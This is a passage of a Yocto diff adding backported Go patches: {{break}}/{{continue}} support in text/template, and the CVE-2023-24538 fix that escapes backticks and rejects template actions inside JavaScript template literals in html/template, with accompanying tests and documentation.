+diff --git a/src/html/template/context.go b/src/html/template/context.go
+index f7d4849..aaa7d08 100644
+--- a/src/html/template/context.go
++++ b/src/html/template/context.go
+@@ -6,6 +6,7 @@ package template
+
+ import (
+ "fmt"
++ "text/template/parse"
+ )
+
+ // context describes the state an HTML parser must be in when it reaches the
+@@ -22,6 +23,7 @@ type context struct {
+ jsCtx jsCtx
+ attr attr
+ element element
++ n parse.Node // for range break/continue
+ err *Error
+ }
+
+@@ -141,6 +143,8 @@ const (
+ // stateError is an infectious error state outside any valid
+ // HTML/CSS/JS construct.
+ stateError
++ // stateDead marks unreachable code after a {{break}} or {{continue}}.
++ stateDead
+ )
+
+ // isComment is true for any state that contains content meant for template
+diff --git a/src/html/template/escape.go b/src/html/template/escape.go
+index 8739735..6dea79c 100644
+--- a/src/html/template/escape.go
++++ b/src/html/template/escape.go
+@@ -97,6 +97,15 @@ type escaper struct {
+ actionNodeEdits map[*parse.ActionNode][]string
+ templateNodeEdits map[*parse.TemplateNode]string
+ textNodeEdits map[*parse.TextNode][]byte
++ // rangeContext holds context about the current range loop.
++ rangeContext *rangeContext
++}
++
++// rangeContext holds information about the current range loop.
++type rangeContext struct {
++ outer *rangeContext // outer loop
++ breaks []context // context at each break action
++ continues []context // context at each continue action
+ }
+
+ // makeEscaper creates a blank escaper for the given set.
+@@ -109,6 +118,7 @@ func makeEscaper(n *nameSpace) escaper {
+ map[*parse.ActionNode][]string{},
+ map[*parse.TemplateNode]string{},
+ map[*parse.TextNode][]byte{},
++ nil,
+ }
+ }
+
+@@ -124,8 +134,16 @@ func (e *escaper) escape(c context, n parse.Node) context {
+ switch n := n.(type) {
+ case *parse.ActionNode:
+ return e.escapeAction(c, n)
++ case *parse.BreakNode:
++ c.n = n
++ e.rangeContext.breaks = append(e.rangeContext.breaks, c)
++ return context{state: stateDead}
+ case *parse.CommentNode:
+ return c
++ case *parse.ContinueNode:
++ c.n = n
++ e.rangeContext.continues = append(e.rangeContext.breaks, c)
++ return context{state: stateDead}
+ case *parse.IfNode:
+ return e.escapeBranch(c, &n.BranchNode, "if")
+ case *parse.ListNode:
+@@ -427,6 +445,12 @@ func join(a, b context, node parse.Node, nodeName string) context {
+ if b.state == stateError {
+ return b
+ }
++ if a.state == stateDead {
++ return b
++ }
++ if b.state == stateDead {
++ return a
++ }
+ if a.eq(b) {
+ return a
+ }
+@@ -466,14 +490,27 @@ func join(a, b context, node parse.Node, nodeName string) context {
+
+ // escapeBranch escapes a branch template node: "if", "range" and "with".
+ func (e *escaper) escapeBranch(c context, n *parse.BranchNode, nodeName string) context {
++ if nodeName == "range" {
++ e.rangeContext = &rangeContext{outer: e.rangeContext}
++ }
+ c0 := e.escapeList(c, n.List)
+- if nodeName == "range" && c0.state != stateError {
++ if nodeName == "range" {
++ if c0.state != stateError {
++ c0 = joinRange(c0, e.rangeContext)
++ }
++ e.rangeContext = e.rangeContext.outer
++ if c0.state == stateError {
++ return c0
++ }
++
+ // The "true" branch of a "range" node can execute multiple times.
+ // We check that executing n.List once results in the same context
+ // as executing n.List twice.
++ e.rangeContext = &rangeContext{outer: e.rangeContext}
+ c1, _ := e.escapeListConditionally(c0, n.List, nil)
+ c0 = join(c0, c1, n, nodeName)
+ if c0.state == stateError {
++ e.rangeContext = e.rangeContext.outer
+ // Make clear that this is a problem on loop re-entry
+ // since developers tend to overlook that branch when
+ // debugging templates.
+@@ -481,11 +518,39 @@ func (e *escaper) escapeBranch(c context, n *parse.BranchNode, nodeName string)
+ c0.err.Description = "on range loop re-entry: " + c0.err.Description
+ return c0
+ }
++ c0 = joinRange(c0, e.rangeContext)
++ e.rangeContext = e.rangeContext.outer
++ if c0.state == stateError {
++ return c0
++ }
+ }
+ c1 := e.escapeList(c, n.ElseList)
+ return join(c0, c1, n, nodeName)
+ }
+
++func joinRange(c0 context, rc *rangeContext) context {
++ // Merge contexts at break and continue statements into overall body context.
++ // In theory we could treat breaks differently from continues, but for now it is
++ // enough to treat them both as going back to the start of the loop (which may then stop).
++ for _, c := range rc.breaks {
++ c0 = join(c0, c, c.n, "range")
++ if c0.state == stateError {
++ c0.err.Line = c.n.(*parse.BreakNode).Line
++ c0.err.Description = "at range loop break: " + c0.err.Description
++ return c0
++ }
++ }
++ for _, c := range rc.continues {
++ c0 = join(c0, c, c.n, "range")
++ if c0.state == stateError {
++ c0.err.Line = c.n.(*parse.ContinueNode).Line
++ c0.err.Description = "at range loop continue: " + c0.err.Description
++ return c0
++ }
++ }
++ return c0
++}
++
+ // escapeList escapes a list template node.
+ func (e *escaper) escapeList(c context, n *parse.ListNode) context {
+ if n == nil {
+@@ -493,6 +558,9 @@ func (e *escaper) escapeList(c context, n *parse.ListNode) context {
+ }
+ for _, m := range n.Nodes {
+ c = e.escape(c, m)
++ if c.state == stateDead {
++ break
++ }
+ }
+ return c
+ }
+@@ -503,6 +571,7 @@ func (e *escaper) escapeList(c context, n *parse.ListNode) context {
+ // which is the same as whether e was updated.
+ func (e *escaper) escapeListConditionally(c context, n *parse.ListNode, filter func(*escaper, context) bool) (context, bool) {
+ e1 := makeEscaper(e.ns)
++ e1.rangeContext = e.rangeContext
+ // Make type inferences available to f.
+ for k, v := range e.output {
+ e1.output[k] = v
+diff --git a/src/html/template/escape_test.go b/src/html/template/escape_test.go
+index c709660..fa2b84a 100644
+--- a/src/html/template/escape_test.go
++++ b/src/html/template/escape_test.go
+@@ -920,6 +920,22 @@ func TestErrors(t *testing.T) {
+ "<a href='/foo?{{range .Items}}&{{.K}}={{.V}}{{end}}'>",
+ "",
+ },
++ {
++ "{{range .Items}}<a{{if .X}}{{end}}>{{end}}",
++ "",
++ },
++ {
++ "{{range .Items}}<a{{if .X}}{{end}}>{{continue}}{{end}}",
++ "",
++ },
++ {
++ "{{range .Items}}<a{{if .X}}{{end}}>{{break}}{{end}}",
++ "",
++ },
++ {
++ "{{range .Items}}<a{{if .X}}{{end}}>{{if .X}}{{break}}{{end}}{{end}}",
++ "",
++ },
+ // Error cases.
+ {
+ "{{if .Cond}}<a{{end}}",
+@@ -956,6 +972,14 @@ func TestErrors(t *testing.T) {
+ "z:2:8: on range loop re-entry: {{range}} branches",
+ },
+ {
++ "{{range .Items}}<a{{if .X}}{{break}}{{end}}>{{end}}",
++ "z:1:29: at range loop break: {{range}} branches end in different contexts",
++ },
++ {
++ "{{range .Items}}<a{{if .X}}{{continue}}{{end}}>{{end}}",
++ "z:1:29: at range loop continue: {{range}} branches end in different contexts",
++ },
++ {
+ "<a b=1 c={{.H}}",
+ "z: ends in a non-text context: {stateAttr delimSpaceOrTagEnd",
+ },
+diff --git a/src/text/template/doc.go b/src/text/template/doc.go
+index 7b30294..0228b15 100644
+--- a/src/text/template/doc.go
++++ b/src/text/template/doc.go
+@@ -112,6 +112,14 @@ data, defined in detail in the corresponding sections that follow.
+ T0 is executed; otherwise, dot is set to the successive elements
+ of the array, slice, or map and T1 is executed.
+
++ {{break}}
++ The innermost {{range pipeline}} loop is ended early, stopping the
++ current iteration and bypassing all remaining iterations.
++
++ {{continue}}
++ The current iteration of the innermost {{range pipeline}} loop is
++ stopped, and the loop starts the next iteration.
++
+ {{template "name"}}
+ The template with the specified name is executed with nil data.
+
+diff --git a/src/text/template/exec.go b/src/text/template/exec.go
+index 7ac5175..6cb140a 100644
+--- a/src/text/template/exec.go
++++ b/src/text/template/exec.go
+@@ -5,6 +5,7 @@
+ package template
+
+ import (
++ "errors"
+ "fmt"
+ "internal/fmtsort"
+ "io"
+@@ -244,6 +245,12 @@ func (t *Template) DefinedTemplates() string {
+ return b.String()
+ }
+
++// Sentinel errors for use with panic to signal early exits from range loops.
++var (
++ walkBreak = errors.New("break")
++ walkContinue = errors.New("continue")
++)
++
+ // Walk functions step through the major pieces of the template structure,
+ // generating output as they go.
+ func (s *state) walk(dot reflect.Value, node parse.Node) {
+@@ -256,7 +263,11 @@ func (s *state) walk(dot reflect.Value, node parse.Node) {
+ if len(node.Pipe.Decl) == 0 {
+ s.printValue(node, val)
+ }
++ case *parse.BreakNode:
++ panic(walkBreak)
+ case *parse.CommentNode:
++ case *parse.ContinueNode:
++ panic(walkContinue)
+ case *parse.IfNode:
+ s.walkIfOrWith(parse.NodeIf, dot, node.Pipe, node.List, node.ElseList)
+ case *parse.ListNode:
+@@ -335,6 +346,11 @@ func isTrue(val reflect.Value) (truth, ok bool) {
+
+ func (s *state) walkRange(dot reflect.Value, r *parse.RangeNode) {
+ s.at(r)
++ defer func() {
++ if r := recover(); r != nil && r != walkBreak {
++ panic(r)
++ }
++ }()
+ defer s.pop(s.mark())
+ val, _ := indirect(s.evalPipeline(dot, r.Pipe))
+ // mark top of stack before any variables in the body are pushed.
+@@ -348,8 +364,14 @@ func (s *state) walkRange(dot reflect.Value, r *parse.RangeNode) {
+ if len(r.Pipe.Decl) > 1 {
+ s.setTopVar(2, index)
+ }
++ defer s.pop(mark)
++ defer func() {
++ // Consume panic(walkContinue)
++ if r := recover(); r != nil && r != walkContinue {
++ panic(r)
++ }
++ }()
+ s.walk(elem, r.List)
+- s.pop(mark)
+ }
+ switch val.Kind() {
+ case reflect.Array, reflect.Slice:
+diff --git a/src/text/template/exec_test.go b/src/text/template/exec_test.go
+index 3309b33..a639f44 100644
+--- a/src/text/template/exec_test.go
++++ b/src/text/template/exec_test.go
+@@ -563,6 +563,8 @@ var execTests = []execTest{
+ {"range empty no else", "{{range .SIEmpty}}-{{.}}-{{end}}", "", tVal, true},
+ {"range []int else", "{{range .SI}}-{{.}}-{{else}}EMPTY{{end}}", "-3--4--5-", tVal, true},
+ {"range empty else", "{{range .SIEmpty}}-{{.}}-{{else}}EMPTY{{end}}", "EMPTY", tVal, true},
++ {"range []int break else", "{{range .SI}}-{{.}}-{{break}}NOTREACHED{{else}}EMPTY{{end}}", "-3-", tVal, true},
++ {"range []int continue else", "{{range .SI}}-{{.}}-{{continue}}NOTREACHED{{else}}EMPTY{{end}}", "-3--4--5-", tVal, true},
+ {"range []bool", "{{range .SB}}-{{.}}-{{end}}", "-true--false-", tVal, true},
+ {"range []int method", "{{range .SI | .MAdd .I}}-{{.}}-{{end}}", "-20--21--22-", tVal, true},
+ {"range map", "{{range .MSI}}-{{.}}-{{end}}", "-1--3--2-", tVal, true},
+diff --git a/src/text/template/parse/lex.go b/src/text/template/parse/lex.go
+index 6784071..95e3377 100644
+--- a/src/text/template/parse/lex.go
++++ b/src/text/template/parse/lex.go
+@@ -62,6 +62,8 @@ const (
+ // Keywords appear after all the rest.
+ itemKeyword // used only to delimit the keywords
+ itemBlock // block keyword
++ itemBreak // break keyword
++ itemContinue // continue keyword
+ itemDot // the cursor, spelled '.'
+ itemDefine // define keyword
+ itemElse // else keyword
+@@ -76,6 +78,8 @@ const (
+ var key = map[string]itemType{
+ ".": itemDot,
+ "block": itemBlock,
++ "break": itemBreak,
++ "continue": itemContinue,
+ "define": itemDefine,
+ "else": itemElse,
+ "end": itemEnd,
+@@ -119,6 +123,8 @@ type lexer struct {
+ parenDepth int // nesting depth of ( ) exprs
+ line int // 1+number of newlines seen
+ startLine int // start line of this item
++ breakOK bool // break keyword allowed
++ continueOK bool // continue keyword allowed
+ }
+
+ // next returns the next rune in the input.
+@@ -461,7 +467,12 @@ Loop:
+ }
+ switch {
+ case key[word] > itemKeyword:
+- l.emit(key[word])
++ item := key[word]
++ if item == itemBreak && !l.breakOK || item == itemContinue && !l.continueOK {
++ l.emit(itemIdentifier)
++ } else {
++ l.emit(item)
++ }
+ case word[0] == '.':
+ l.emit(itemField)
+ case word == "true", word == "false":
+diff --git a/src/text/template/parse/lex_test.go b/src/text/template/parse/lex_test.go
+index 6510eed..df6aabf 100644
+--- a/src/text/template/parse/lex_test.go
++++ b/src/text/template/parse/lex_test.go
+@@ -35,6 +35,8 @@ var itemName = map[itemType]string{
+ // keywords
+ itemDot: ".",
+ itemBlock: "block",
++ itemBreak: "break",
++ itemContinue: "continue",
+ itemDefine: "define",
+ itemElse: "else",
+ itemIf: "if",
+diff --git a/src/text/template/parse/node.go b/src/text/template/parse/node.go
+index a9dad5e..c398da0 100644
+--- a/src/text/template/parse/node.go
++++ b/src/text/template/parse/node.go
+@@ -71,6 +71,8 @@ const (
+ NodeVariable // A $ variable.
+ NodeWith // A with action.
+ NodeComment // A comment.
++ NodeBreak // A break action.
++ NodeContinue // A continue action.
+ )
+
+ // Nodes.
+@@ -907,6 +909,40 @@ func (i *IfNode) Copy() Node {
+ return i.tr.newIf(i.Pos, i.Line, i.Pipe.CopyPipe(), i.List.CopyList(), i.ElseList.CopyList())
+ }
+
++// BreakNode represents a {{break}} action.
++type BreakNode struct {
++ tr *Tree
++ NodeType
++ Pos
++ Line int
++}
++
++func (t *Tree) newBreak(pos Pos, line int) *BreakNode {
++ return &BreakNode{tr: t, NodeType: NodeBreak, Pos: pos, Line: line}
++}
++
++func (b *BreakNode) Copy() Node { return b.tr.newBreak(b.Pos, b.Line) }
++func (b *BreakNode) String() string { return "{{break}}" }
++func (b *BreakNode) tree() *Tree { return b.tr }
++func (b *BreakNode) writeTo(sb *strings.Builder) { sb.WriteString("{{break}}") }
++
++// ContinueNode represents a {{continue}} action.
++type ContinueNode struct {
++ tr *Tree
++ NodeType
++ Pos
++ Line int
++}
++
++func (t *Tree) newContinue(pos Pos, line int) *ContinueNode {
++ return &ContinueNode{tr: t, NodeType: NodeContinue, Pos: pos, Line: line}
++}
++
++func (c *ContinueNode) Copy() Node { return c.tr.newContinue(c.Pos, c.Line) }
++func (c *ContinueNode) String() string { return "{{continue}}" }
++func (c *ContinueNode) tree() *Tree { return c.tr }
++func (c *ContinueNode) writeTo(sb *strings.Builder) { sb.WriteString("{{continue}}") }
++
+ // RangeNode represents a {{range}} action and its commands.
+ type RangeNode struct {
+ BranchNode
+diff --git a/src/text/template/parse/parse.go b/src/text/template/parse/parse.go
+index 5e6e512..7f78b56 100644
+--- a/src/text/template/parse/parse.go
++++ b/src/text/template/parse/parse.go
+@@ -31,6 +31,7 @@ type Tree struct {
+ vars []string // variables defined at the moment.
+ treeSet map[string]*Tree
+ actionLine int // line of left delim starting action
++ rangeDepth int
+ mode Mode
+ }
+
+@@ -223,6 +224,8 @@ func (t *Tree) startParse(funcs []map[string]interface{}, lex *lexer, treeSet ma
+ t.vars = []string{"$"}
+ t.funcs = funcs
+ t.treeSet = treeSet
++ lex.breakOK = !t.hasFunction("break")
++ lex.continueOK = !t.hasFunction("continue")
+ }
+
+ // stopParse terminates parsing.
+@@ -385,6 +388,10 @@ func (t *Tree) action() (n Node) {
+ switch token := t.nextNonSpace(); token.typ {
+ case itemBlock:
+ return t.blockControl()
++ case itemBreak:
++ return t.breakControl(token.pos, token.line)
++ case itemContinue:
++ return t.continueControl(token.pos, token.line)
+ case itemElse:
+ return t.elseControl()
+ case itemEnd:
+@@ -404,6 +411,32 @@ func (t *Tree) action() (n Node) {
+ return t.newAction(token.pos, token.line, t.pipeline("command", itemRightDelim))
+ }
+
++// Break:
++// {{break}}
++// Break keyword is past.
++func (t *Tree) breakControl(pos Pos, line int) Node {
++ if token := t.next(); token.typ != itemRightDelim {
++ t.unexpected(token, "in {{break}}")
++ }
++ if t.rangeDepth == 0 {
++ t.errorf("{{break}} outside {{range}}")
++ }
++ return t.newBreak(pos, line)
++}
++
++// Continue:
++// {{continue}}
++// Continue keyword is past.
++func (t *Tree) continueControl(pos Pos, line int) Node {
++ if token := t.next(); token.typ != itemRightDelim {
++ t.unexpected(token, "in {{continue}}")
++ }
++ if t.rangeDepth == 0 {
++ t.errorf("{{continue}} outside {{range}}")
++ }
++ return t.newContinue(pos, line)
++}
++
+ // Pipeline:
+ // declarations? command ('|' command)*
+ func (t *Tree) pipeline(context string, end itemType) (pipe *PipeNode) {
+@@ -479,8 +512,14 @@ func (t *Tree) checkPipeline(pipe *PipeNode, context string) {
+ func (t *Tree) parseControl(allowElseIf bool, context string) (pos Pos, line int, pipe *PipeNode, list, elseList *ListNode) {
+ defer t.popVars(len(t.vars))
+ pipe = t.pipeline(context, itemRightDelim)
++ if context == "range" {
++ t.rangeDepth++
++ }
+ var next Node
+ list, next = t.itemList()
++ if context == "range" {
++ t.rangeDepth--
++ }
+ switch next.Type() {
+ case nodeEnd: //done
+ case nodeElse:
+@@ -522,7 +561,8 @@ func (t *Tree) ifControl() Node {
+ // {{range pipeline}} itemList {{else}} itemList {{end}}
+ // Range keyword is past.
+ func (t *Tree) rangeControl() Node {
+- return t.newRange(t.parseControl(false, "range"))
++ r := t.newRange(t.parseControl(false, "range"))
++ return r
+ }
+
+ // With:
+diff --git a/src/text/template/parse/parse_test.go b/src/text/template/parse/parse_test.go
+index 220f984..ba45636 100644
+--- a/src/text/template/parse/parse_test.go
++++ b/src/text/template/parse/parse_test.go
+@@ -230,6 +230,10 @@ var parseTests = []parseTest{
+ `{{range $x := .SI}}{{.}}{{end}}`},
+ {"range 2 vars", "{{range $x, $y := .SI}}{{.}}{{end}}", noError,
+ `{{range $x, $y := .SI}}{{.}}{{end}}`},
++ {"range with break", "{{range .SI}}{{.}}{{break}}{{end}}", noError,
++ `{{range .SI}}{{.}}{{break}}{{end}}`},
++ {"range with continue", "{{range .SI}}{{.}}{{continue}}{{end}}", noError,
++ `{{range .SI}}{{.}}{{continue}}{{end}}`},
+ {"constants", "{{range .SI 1 -3.2i true false 'a' nil}}{{end}}", noError,
+ `{{range .SI 1 -3.2i true false 'a' nil}}{{end}}`},
+ {"template", "{{template `x`}}", noError,
+@@ -279,6 +283,10 @@ var parseTests = []parseTest{
+ {"adjacent args", "{{printf 3`x`}}", hasError, ""},
+ {"adjacent args with .", "{{printf `x`.}}", hasError, ""},
+ {"extra end after if", "{{if .X}}a{{else if .Y}}b{{end}}{{end}}", hasError, ""},
++ {"break outside range", "{{range .}}{{end}} {{break}}", hasError, ""},
++ {"continue outside range", "{{range .}}{{end}} {{continue}}", hasError, ""},
++ {"break in range else", "{{range .}}{{else}}{{break}}{{end}}", hasError, ""},
++ {"continue in range else", "{{range .}}{{else}}{{continue}}{{end}}", hasError, ""},
+ // Other kinds of assignments and operators aren't available yet.
+ {"bug0a", "{{$x := 0}}{{$x}}", noError, "{{$x := 0}}{{$x}}"},
+ {"bug0b", "{{$x += 1}}{{$x}}", hasError, ""},
+--
+2.7.4
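Illustrative sketch (not part of the patch series): after this backport, {{break}} and {{continue}} work inside {{range}} in text/template. The template below is an assumed example; it prints "1 2 3 " and stops once the guard fires.

    package main

    import (
            "os"
            "text/template"
    )

    func main() {
            // {{break}} ends the innermost range loop early; {{continue}}
            // skips to the next iteration. Both are errors outside {{range}}.
            const src = "{{range .}}{{if gt . 3}}{{break}}{{end}}{{.}} {{end}}\n"
            tmpl := template.Must(template.New("demo").Parse(src))
            if err := tmpl.Execute(os.Stdout, []int{1, 2, 3, 4, 5}); err != nil {
                    panic(err)
            }
    }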
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-24538_6.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-24538_6.patch
new file mode 100644
index 0000000000..baf400b891
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-24538_6.patch
@@ -0,0 +1,371 @@
+From 16f4882984569f179d73967c9eee679bb9b098c5 Mon Sep 17 00:00:00 2001
+From: Roland Shoemaker <bracewell@google.com>
+Date: Mon, 20 Mar 2023 11:01:13 -0700
+Subject: [PATCH 6/6] html/template: disallow actions in JS template literals
+
+ECMAScript 6 introduced template literals[0][1] which are delimited with
+backticks. These need to be escaped in a similar fashion to the
+delimiters for other string literals. Additionally template literals can
+contain special syntax for string interpolation.
+
+There is no clear way to allow safe insertion of actions within JS
+template literals, as handling (JS) string interpolation inside of these
+literals is rather complex. As such we've chosen to simply disallow
+template actions within these template literals.
+
+A new error code is added for this parsing failure case, errJsTmplLit,
+but it is unexported as it is not backwards compatible with other minor
+release versions to introduce an API change in a minor release. We will
+export this code in the next major release.
+
+The previous behavior (with the caveat that backticks are now escaped
+properly) can be re-enabled with GODEBUG=jstmpllitinterp=1.
+
+This change subsumes CL471455.
+
+Thanks to Sohom Datta, Manipal Institute of Technology, for reporting
+this issue.
+
+Fixes CVE-2023-24538
+For #59234
+Fixes #59271
+
+[0] https://tc39.es/ecma262/multipage/ecmascript-language-expressions.html#sec-template-literals
+[1] https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Template_literals
+
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1802457
+Reviewed-by: Damien Neil <dneil@google.com>
+Run-TryBot: Damien Neil <dneil@google.com>
+Reviewed-by: Julie Qiu <julieqiu@google.com>
+Reviewed-by: Roland Shoemaker <bracewell@google.com>
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1802612
+Run-TryBot: Roland Shoemaker <bracewell@google.com>
+Change-Id: Ic7f10595615f2b2740d9c85ad7ef40dc0e78c04c
+Reviewed-on: https://go-review.googlesource.com/c/go/+/481987
+Auto-Submit: Michael Knyszek <mknyszek@google.com>
+TryBot-Result: Gopher Robot <gobot@golang.org>
+Run-TryBot: Michael Knyszek <mknyszek@google.com>
+Reviewed-by: Matthew Dempsky <mdempsky@google.com>
+
+Upstream-Status: Backport from https://github.com/golang/go/commit/b1e3ecfa06b67014429a197ec5e134ce4303ad9b
+CVE: CVE-2023-24538
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ src/html/template/context.go | 2 ++
+ src/html/template/error.go | 13 ++++++++
+ src/html/template/escape.go | 11 +++++++
+ src/html/template/escape_test.go | 66 ++++++++++++++++++++++-----------------
+ src/html/template/js.go | 2 ++
+ src/html/template/js_test.go | 2 +-
+ src/html/template/jsctx_string.go | 9 ++++++
+ src/html/template/state_string.go | 37 ++++++++++++++++++++--
+ src/html/template/transition.go | 7 ++++-
+ 9 files changed, 116 insertions(+), 33 deletions(-)
+
+diff --git a/src/html/template/context.go b/src/html/template/context.go
+index f7d4849..0b65313 100644
+--- a/src/html/template/context.go
++++ b/src/html/template/context.go
+@@ -116,6 +116,8 @@ const (
+ stateJSDqStr
+ // stateJSSqStr occurs inside a JavaScript single quoted string.
+ stateJSSqStr
++ // stateJSBqStr occurs inside a JavaScript back quoted string.
++ stateJSBqStr
+ // stateJSRegexp occurs inside a JavaScript regexp literal.
+ stateJSRegexp
+ // stateJSBlockCmt occurs inside a JavaScript /* block comment */.
+diff --git a/src/html/template/error.go b/src/html/template/error.go
+index 0e52706..fd26b64 100644
+--- a/src/html/template/error.go
++++ b/src/html/template/error.go
+@@ -211,6 +211,19 @@ const (
+ // pipeline occurs in an unquoted attribute value context, "html" is
+ // disallowed. Avoid using "html" and "urlquery" entirely in new templates.
+ ErrPredefinedEscaper
++
++ // errJSTmplLit: "... appears in a JS template literal"
++ // Example:
++ // <script>var tmpl = `{{.Interp}`</script>
++ // Discussion:
++ // Package html/template does not support actions inside of JS template
++ // literals.
++ //
++ // TODO(rolandshoemaker): we cannot add this as an exported error in a minor
++ // release, since it is backwards incompatible with the other minor
++ // releases. As such we need to leave it unexported, and then we'll add it
++ // in the next major release.
++ errJSTmplLit
+ )
+
+ func (e *Error) Error() string {
+diff --git a/src/html/template/escape.go b/src/html/template/escape.go
+index f12dafa..29ca5b3 100644
+--- a/src/html/template/escape.go
++++ b/src/html/template/escape.go
+@@ -8,6 +8,7 @@ import (
+ "bytes"
+ "fmt"
+ "html"
++ "internal/godebug"
+ "io"
+ "text/template"
+ "text/template/parse"
+@@ -203,6 +204,16 @@ func (e *escaper) escapeAction(c context, n *parse.ActionNode) context {
+ c.jsCtx = jsCtxDivOp
+ case stateJSDqStr, stateJSSqStr:
+ s = append(s, "_html_template_jsstrescaper")
++ case stateJSBqStr:
++ debugAllowActionJSTmpl := godebug.Get("jstmpllitinterp")
++ if debugAllowActionJSTmpl == "1" {
++ s = append(s, "_html_template_jsstrescaper")
++ } else {
++ return context{
++ state: stateError,
++ err: errorf(errJSTmplLit, n, n.Line, "%s appears in a JS template literal", n),
++ }
++ }
+ case stateJSRegexp:
+ s = append(s, "_html_template_jsregexpescaper")
+ case stateCSS:
+diff --git a/src/html/template/escape_test.go b/src/html/template/escape_test.go
+index fa2b84a..1b150e9 100644
+--- a/src/html/template/escape_test.go
++++ b/src/html/template/escape_test.go
+@@ -681,35 +681,31 @@ func TestEscape(t *testing.T) {
+ }
+
+ for _, test := range tests {
+- tmpl := New(test.name)
+- tmpl = Must(tmpl.Parse(test.input))
+- // Check for bug 6459: Tree field was not set in Parse.
+- if tmpl.Tree != tmpl.text.Tree {
+- t.Errorf("%s: tree not set properly", test.name)
+- continue
+- }
+- b := new(bytes.Buffer)
+- if err := tmpl.Execute(b, data); err != nil {
+- t.Errorf("%s: template execution failed: %s", test.name, err)
+- continue
+- }
+- if w, g := test.output, b.String(); w != g {
+- t.Errorf("%s: escaped output: want\n\t%q\ngot\n\t%q", test.name, w, g)
+- continue
+- }
+- b.Reset()
+- if err := tmpl.Execute(b, pdata); err != nil {
+- t.Errorf("%s: template execution failed for pointer: %s", test.name, err)
+- continue
+- }
+- if w, g := test.output, b.String(); w != g {
+- t.Errorf("%s: escaped output for pointer: want\n\t%q\ngot\n\t%q", test.name, w, g)
+- continue
+- }
+- if tmpl.Tree != tmpl.text.Tree {
+- t.Errorf("%s: tree mismatch", test.name)
+- continue
+- }
++ t.Run(test.name, func(t *testing.T) {
++ tmpl := New(test.name)
++ tmpl = Must(tmpl.Parse(test.input))
++ // Check for bug 6459: Tree field was not set in Parse.
++ if tmpl.Tree != tmpl.text.Tree {
++ t.Fatalf("%s: tree not set properly", test.name)
++ }
++ b := new(strings.Builder)
++ if err := tmpl.Execute(b, data); err != nil {
++ t.Fatalf("%s: template execution failed: %s", test.name, err)
++ }
++ if w, g := test.output, b.String(); w != g {
++ t.Fatalf("%s: escaped output: want\n\t%q\ngot\n\t%q", test.name, w, g)
++ }
++ b.Reset()
++ if err := tmpl.Execute(b, pdata); err != nil {
++ t.Fatalf("%s: template execution failed for pointer: %s", test.name, err)
++ }
++ if w, g := test.output, b.String(); w != g {
++ t.Fatalf("%s: escaped output for pointer: want\n\t%q\ngot\n\t%q", test.name, w, g)
++ }
++ if tmpl.Tree != tmpl.text.Tree {
++ t.Fatalf("%s: tree mismatch", test.name)
++ }
++ })
+ }
+ }
+
+@@ -936,6 +932,10 @@ func TestErrors(t *testing.T) {
+ "{{range .Items}}<a{{if .X}}{{end}}>{{if .X}}{{break}}{{end}}{{end}}",
+ "",
+ },
++ {
++ "<script>var a = `${a+b}`</script>`",
++ "",
++ },
+ // Error cases.
+ {
+ "{{if .Cond}}<a{{end}}",
+@@ -1082,6 +1082,10 @@ func TestErrors(t *testing.T) {
+ // html is allowed since it is the last command in the pipeline, but urlquery is not.
+ `predefined escaper "urlquery" disallowed in template`,
+ },
++ {
++ "<script>var tmpl = `asd {{.}}`;</script>",
++ `{{.}} appears in a JS template literal`,
++ },
+ }
+ for _, test := range tests {
+ buf := new(bytes.Buffer)
+@@ -1304,6 +1308,10 @@ func TestEscapeText(t *testing.T) {
+ context{state: stateJSSqStr, delim: delimDoubleQuote, attr: attrScript},
+ },
+ {
++ "<a onclick=\"`foo",
++ context{state: stateJSBqStr, delim: delimDoubleQuote, attr: attrScript},
++ },
++ {
+ `<A ONCLICK="'`,
+ context{state: stateJSSqStr, delim: delimDoubleQuote, attr: attrScript},
+ },
+diff --git a/src/html/template/js.go b/src/html/template/js.go
+index ea9c183..b888eaf 100644
+--- a/src/html/template/js.go
++++ b/src/html/template/js.go
+@@ -308,6 +308,7 @@ var jsStrReplacementTable = []string{
+ // Encode HTML specials as hex so the output can be embedded
+ // in HTML attributes without further encoding.
+ '"': `\u0022`,
++ '`': `\u0060`,
+ '&': `\u0026`,
+ '\'': `\u0027`,
+ '+': `\u002b`,
+@@ -331,6 +332,7 @@ var jsStrNormReplacementTable = []string{
+ '"': `\u0022`,
+ '&': `\u0026`,
+ '\'': `\u0027`,
++ '`': `\u0060`,
+ '+': `\u002b`,
+ '/': `\/`,
+ '<': `\u003c`,
+diff --git a/src/html/template/js_test.go b/src/html/template/js_test.go
+index d7ee47b..7d963ae 100644
+--- a/src/html/template/js_test.go
++++ b/src/html/template/js_test.go
+@@ -292,7 +292,7 @@ func TestEscapersOnLower7AndSelectHighCodepoints(t *testing.T) {
+ `0123456789:;\u003c=\u003e?` +
+ `@ABCDEFGHIJKLMNO` +
+ `PQRSTUVWXYZ[\\]^_` +
+- "`abcdefghijklmno" +
++ "\\u0060abcdefghijklmno" +
+ "pqrstuvwxyz{|}~\u007f" +
+ "\u00A0\u0100\\u2028\\u2029\ufeff\U0001D11E",
+ },
+diff --git a/src/html/template/jsctx_string.go b/src/html/template/jsctx_string.go
+index dd1d87e..2394893 100644
+--- a/src/html/template/jsctx_string.go
++++ b/src/html/template/jsctx_string.go
+@@ -4,6 +4,15 @@ package template
+
+ import "strconv"
+
++func _() {
++ // An "invalid array index" compiler error signifies that the constant values have changed.
++ // Re-run the stringer command to generate them again.
++ var x [1]struct{}
++ _ = x[jsCtxRegexp-0]
++ _ = x[jsCtxDivOp-1]
++ _ = x[jsCtxUnknown-2]
++}
++
+ const _jsCtx_name = "jsCtxRegexpjsCtxDivOpjsCtxUnknown"
+
+ var _jsCtx_index = [...]uint8{0, 11, 21, 33}
+diff --git a/src/html/template/state_string.go b/src/html/template/state_string.go
+index 05104be..6fb1a6e 100644
+--- a/src/html/template/state_string.go
++++ b/src/html/template/state_string.go
+@@ -4,9 +4,42 @@ package template
+
+ import "strconv"
+
